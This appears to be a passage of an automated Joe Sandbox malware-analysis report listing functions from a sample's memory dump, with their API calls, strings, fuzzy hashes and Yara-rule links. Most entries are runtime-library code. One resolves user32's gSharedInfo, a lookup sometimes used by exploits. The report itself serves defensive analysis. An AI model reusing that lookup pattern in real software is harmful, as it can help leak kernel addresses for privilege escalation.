                                                                                                                              • Part of subcall function 00423DEA: std::exception::exception.LIBCMT ref: 00423E25
                                                                                                                            • _memmove.LIBCMT ref: 00402CD1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$_memmove
                                                                                                                            • String ID: invalid string position$string too long
                                                                                                                            • API String ID: 1615890066-4289949731
                                                                                                                            • Opcode ID: 9b79f654a2debf70a313bb16433d7a314f380207c4e6c539a90a7358e1487792
                                                                                                                            • Instruction ID: f380dc011fae16a05292a652e213d1f5969693d70e6bdf194ed0e62b7d50edb5
                                                                                                                            • Opcode Fuzzy Hash: 9b79f654a2debf70a313bb16433d7a314f380207c4e6c539a90a7358e1487792
                                                                                                                            • Instruction Fuzzy Hash: F82109333042105BD7209E6CE984A6EF799EBA1365B20093FF041DB2C1C6F9D94483A8
                                                                                                                            Function 0042F7FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___BuildCatchObject.LIBCMT ref: 0042F80E
                                                                                                                              • Part of subcall function 0042F769: ___BuildCatchObjectHelper.LIBCMT ref: 0042F79F
                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 0042F825
                                                                                                                            • ___FrameUnwindToState.LIBCMT ref: 0042F833
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                            • String ID: csm$csm
                                                                                                                            • API String ID: 2163707966-3733052814
                                                                                                                            • Opcode ID: 4a61a2d52b0bc3a74fdd56ea7b2520c29e380175ca527c9f51821e9418d154e1
                                                                                                                            • Instruction ID: 35c86a7ea48db691c2fae8fb970ae395304450bfd9a7a45420d77627640d1373
                                                                                                                            • Opcode Fuzzy Hash: 4a61a2d52b0bc3a74fdd56ea7b2520c29e380175ca527c9f51821e9418d154e1
                                                                                                                            • Instruction Fuzzy Hash: AE01283110012ABBDF126F52EC45EAB7E7AEF08354F804036BD1815121DB7A98B5DBA9
                                                                                                                            Function 0042526B Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 00425279
                                                                                                                              • Part of subcall function 00424B82: __FF_MSGBANNER.LIBCMT ref: 00424B9B
                                                                                                                              • Part of subcall function 00424B82: __NMSG_WRITE.LIBCMT ref: 00424BA2
                                                                                                                              • Part of subcall function 00424B82: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0042BB22,00000000,00000001,00000000,?,0042A446,00000018,00437060,0000000C,0042A4D6), ref: 00424BC7
                                                                                                                            • _free.LIBCMT ref: 0042528C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2734353464-0
                                                                                                                            • Opcode ID: c6bdd99ffc9e723cbfbee10e3b90331d8409d7047ee641f11f80580ace6a14e1
                                                                                                                            • Instruction ID: 303440cbd639b63c9e0f56f25b27bf7b376566829b2ef2b6ba667a5b39b707a4
                                                                                                                            • Opcode Fuzzy Hash: c6bdd99ffc9e723cbfbee10e3b90331d8409d7047ee641f11f80580ace6a14e1
                                                                                                                            • Instruction Fuzzy Hash: C011AE32704E35D7CB212B75BC0565A37949F403B5FA1416BF9489A2D1DF3DD8418EAC
                                                                                                                            Function 0042734D Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd.LIBCMT ref: 00427359
                                                                                                                              • Part of subcall function 00427576: __getptd_noexit.LIBCMT ref: 00427579
                                                                                                                              • Part of subcall function 00427576: __amsg_exit.LIBCMT ref: 00427586
                                                                                                                            • __getptd.LIBCMT ref: 00427370
                                                                                                                            • __amsg_exit.LIBCMT ref: 0042737E
                                                                                                                            • __lock.LIBCMT ref: 0042738E
                                                                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 004273A2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 938513278-0
                                                                                                                            • Opcode ID: 54c2f71e7f4421a5e04ae7c57690b572abebdbd578d104f1fdc764d6efdd8cb8
                                                                                                                            • Instruction ID: 4e945a9602c2599bfda43b3e09900f0a81e55d254053af84444372c591fc76f4
                                                                                                                            • Opcode Fuzzy Hash: 54c2f71e7f4421a5e04ae7c57690b572abebdbd578d104f1fdc764d6efdd8cb8
                                                                                                                            • Instruction Fuzzy Hash: 4BF06231B49630DBD711FB657807B5962909F00728FA1418FFC44672D2DB7C5841DA5E
                                                                                                                            Function 004010A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::exception::exception.LIBCMT ref: 00401116
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040112B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                                                            • String ID: NULL$4C
                                                                                                                            • API String ID: 3728558374-1282692239
                                                                                                                            • Opcode ID: 33808c3854b2259bcd7a82078fa9c6c209a995163827107ddf829d201c8a9eac
                                                                                                                            • Instruction ID: b3ae1bd3d58b088f2b380a9d5d3b1efe849a21ab515698cc0b20f447eb10873f
                                                                                                                            • Opcode Fuzzy Hash: 33808c3854b2259bcd7a82078fa9c6c209a995163827107ddf829d201c8a9eac
                                                                                                                            • Instruction Fuzzy Hash: 41115C71E00219ABCB14DFA9E841A9EBBB4EB08714F50852FE921B7281DB785604CB98
                                                                                                                            Function 0041EBE0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(user32.dll,0041ECE4,000000FC,774E267D), ref: 0041EBE5
                                                                                                                            • GetProcAddress.KERNEL32(00000000,gSharedInfo), ref: 0041EBF8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                            • String ID: gSharedInfo$user32.dll
                                                                                                                            • API String ID: 1646373207-999560209
                                                                                                                            • Opcode ID: 7608db308a29dce760263480e7203b5d3808d5ed795dd706531d16fa86081a39
                                                                                                                            • Instruction ID: ae76247dc9f31e7de8133061f811e50f9bb29006db9acc4deabd45f6b953e967
                                                                                                                            • Opcode Fuzzy Hash: 7608db308a29dce760263480e7203b5d3808d5ed795dd706531d16fa86081a39
                                                                                                                            • Instruction Fuzzy Hash: C801D6353042129EDB148B2EEC04AA777A5AF80711719847BD401CB265E739FCC2C798
                                                                                                                            Function 004104F0 Relevance: 6.5, APIs: 4, Instructions: 452COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9f84d886e4d42a19a87c36e5102503476a3af5eb5526c693e44d88414bddffad
                                                                                                                            • Instruction ID: 2a6b1f398474c41a725a352b1772b0aa02fa5464a8478bab27030f1f99605548
                                                                                                                            • Opcode Fuzzy Hash: 9f84d886e4d42a19a87c36e5102503476a3af5eb5526c693e44d88414bddffad
                                                                                                                            • Instruction Fuzzy Hash: D5E15EB5A00109AFDB04DF68DC95EEF77BAEF88304F14812DF905A7346D634AE518BA4
                                                                                                                            Function 004100B0 Relevance: 6.4, APIs: 4, Instructions: 408COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 27d1509f28c13e3860b7557a938103522342b77dac943ab4e707e1a7e5d684ef
                                                                                                                            • Instruction ID: 0453099c714d3fd7adfcecacc1872658beb67ade4667a523255af1f974051419
                                                                                                                            • Opcode Fuzzy Hash: 27d1509f28c13e3860b7557a938103522342b77dac943ab4e707e1a7e5d684ef
                                                                                                                            • Instruction Fuzzy Hash: 70E1A1B5A00109ABDB10DF58DC81EEF77B9EF88308F14802AF90597341E675EE95CBA5
                                                                                                                            Function 0042BC06 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042BC3A
                                                                                                                            • __isleadbyte_l.LIBCMT ref: 0042BC6D
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,004240F7,?,00000000,00000000,?,?,?,?,004240F7,00000000), ref: 0042BC9E
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,004240F7,00000001,00000000,00000000,?,?,?,?,004240F7,00000000), ref: 0042BD0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3058430110-0
                                                                                                                            • Opcode ID: 6d8b5cee2566d10cca19a8cfdd76b668296293fa58a8f10357ce97fb0e3a3eb0
                                                                                                                            • Instruction ID: 38030e61a0c9a17ee5540b27072c0d6a54b5be17954eb73b0215b29c98651c8d
                                                                                                                            • Opcode Fuzzy Hash: 6d8b5cee2566d10cca19a8cfdd76b668296293fa58a8f10357ce97fb0e3a3eb0
                                                                                                                            • Instruction Fuzzy Hash: ED31F331B0026AEFCB20DF65E880ABA7BA0FF01310F94456EE4619B291DB34CD40DB98
                                                                                                                            Function 0041F0C0 Relevance: 6.1, APIs: 4, Instructions: 96COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            • Opcode ID: 1d8cbae804b5630960d1f237a6f30b5b7c642812c9538756dd1e887e047365c4
                                                                                                                            • Instruction ID: 4c62e5054b0cfc70e15e48f7f93e1e2dd02e2ba350b6eca0a9e154429abea764
                                                                                                                            • Opcode Fuzzy Hash: 1d8cbae804b5630960d1f237a6f30b5b7c642812c9538756dd1e887e047365c4
                                                                                                                            • Instruction Fuzzy Hash: B921D9B2600705ABD720CA59DCC0A9BB3EDEB88314F10063FF94987705EA75EE45C794
                                                                                                                            Function 00420490 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            • Opcode ID: f1a3155e9f880124e652f8b13f1add5a57372a3e91b08d197cbbc2f7c51194e6
                                                                                                                            • Instruction ID: e886d6a6018ceb96f8ff47bb3b1a6453668fc3085c5c02bb879b0c1a3e25fc79
                                                                                                                            • Opcode Fuzzy Hash: f1a3155e9f880124e652f8b13f1add5a57372a3e91b08d197cbbc2f7c51194e6
                                                                                                                            • Instruction Fuzzy Hash: 0921F7B27007156FD720DE59E8C0A5BB3EDEB80318F40462FF90587206E6B9EE058B94
                                                                                                                            Function 0041B9A0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memmove$_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1357608183-0
                                                                                                                            • Opcode ID: 25c3b07249827b7ae2665c31a657905adfd888e5fcdc42a50c73a435d248e4b0
                                                                                                                            • Instruction ID: 2d1a9332b6f02ed3abf4b5f4a63fd053b37a9c9ff0061fc046eb1dc110bc3bf1
                                                                                                                            • Opcode Fuzzy Hash: 25c3b07249827b7ae2665c31a657905adfd888e5fcdc42a50c73a435d248e4b0
                                                                                                                            • Instruction Fuzzy Hash: 7C21D3B2A003056BD720DE59DC80BABB3A8EF88354F00056EF90997741D3B9AE458BE4
                                                                                                                            Function 0041B7F4 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041B830
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041B84C
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041B853
                                                                                                                            • GlobalMemoryStatus.KERNEL32(?), ref: 0041B866
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0041B8A5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCountCurrentFreeGlobalHandleLibraryMemoryProcessStatusTick
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3344549487-0
                                                                                                                            • Opcode ID: 8ec9495c5c8c3def42768fa3f7287ae333d64ad60be0a61d2b8b86069c3be97d
                                                                                                                            • Instruction ID: 246000e8983a6ad2c6fa842b23d7700f142d6bf1d3abb13d60bd01c03ee38282
                                                                                                                            • Opcode Fuzzy Hash: 8ec9495c5c8c3def42768fa3f7287ae333d64ad60be0a61d2b8b86069c3be97d
                                                                                                                            • Instruction Fuzzy Hash: DD2174706147058BC720EF75D884BABB7F8FB85700F00C93EE54996250EB78D8858B9A
                                                                                                                            Function 0042AE2C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00425433), ref: 0042AE2F
                                                                                                                            • __malloc_crt.LIBCMT ref: 0042AE5E
                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0042AE6B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 237123855-0
                                                                                                                            • Opcode ID: a3a728f3e5ea0b91f35fb9e00fd16857c35a5487d6a97c7d827154d125d2727b
                                                                                                                            • Instruction ID: ffafe432d3a1be91cb3ed5c6755412eae5a65b651a6a46b981f985a5bc90e206
                                                                                                                            • Opcode Fuzzy Hash: a3a728f3e5ea0b91f35fb9e00fd16857c35a5487d6a97c7d827154d125d2727b
                                                                                                                            • Instruction Fuzzy Hash: 17F0E9777400309B8F316734BC468976728DBD53A434B442BFC01C3300F6284D8382AB
                                                                                                                            Function 0042439C Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 004243B6
                                                                                                                              • Part of subcall function 00424B82: __FF_MSGBANNER.LIBCMT ref: 00424B9B
                                                                                                                              • Part of subcall function 00424B82: __NMSG_WRITE.LIBCMT ref: 00424BA2
                                                                                                                              • Part of subcall function 00424B82: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0042BB22,00000000,00000001,00000000,?,0042A446,00000018,00437060,0000000C,0042A4D6), ref: 00424BC7
                                                                                                                            • std::exception::exception.LIBCMT ref: 004243EB
                                                                                                                            • std::exception::exception.LIBCMT ref: 00424405
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 00424416
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: std::exception::exception$AllocException@8HeapThrow_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1414122017-0
                                                                                                                            • Opcode ID: bc9ba41937813b3dbd026a79dbbd0576eb7f8ee9a1da54fc8c8f8eca05588792
                                                                                                                            • Instruction ID: 3bc4eef493fb6e2109df5b93117a52ce0cabdca8b754fcba985a042c27bb8c7a
                                                                                                                            • Opcode Fuzzy Hash: bc9ba41937813b3dbd026a79dbbd0576eb7f8ee9a1da54fc8c8f8eca05588792
                                                                                                                            • Instruction Fuzzy Hash: 6EF0F971B00129A6CB04EF16FC02B5E7AB8EF40718F94501BF90496191DB7D8A418B8C
                                                                                                                            Function 00401C70 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 328COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _free_memset
                                                                                                                            • String ID: lIC
                                                                                                                            • API String ID: 287624719-1893863216
                                                                                                                            • Opcode ID: 65f504e415661dcb8aad81a06258e1dec10b6189fc3506ec582dd69d97ee88b7
                                                                                                                            • Instruction ID: 54262715cd33ec2c41cbca7cee069d0d2f3e894dbd4fd1c6745905f8c40289ab
                                                                                                                            • Opcode Fuzzy Hash: 65f504e415661dcb8aad81a06258e1dec10b6189fc3506ec582dd69d97ee88b7
                                                                                                                            • Instruction Fuzzy Hash: AFB1DF726042019BC710EB65DC81A6B77E5AF88308F04497EF944B73A1D77CED4487EA
                                                                                                                            Function 00402960 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • std::_Xinvalid_argument.LIBCPMT ref: 004029C8
                                                                                                                            • _memmove.LIBCMT ref: 00402A14
                                                                                                                              • Part of subcall function 00402C20: std::_Xinvalid_argument.LIBCPMT ref: 00402C3A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
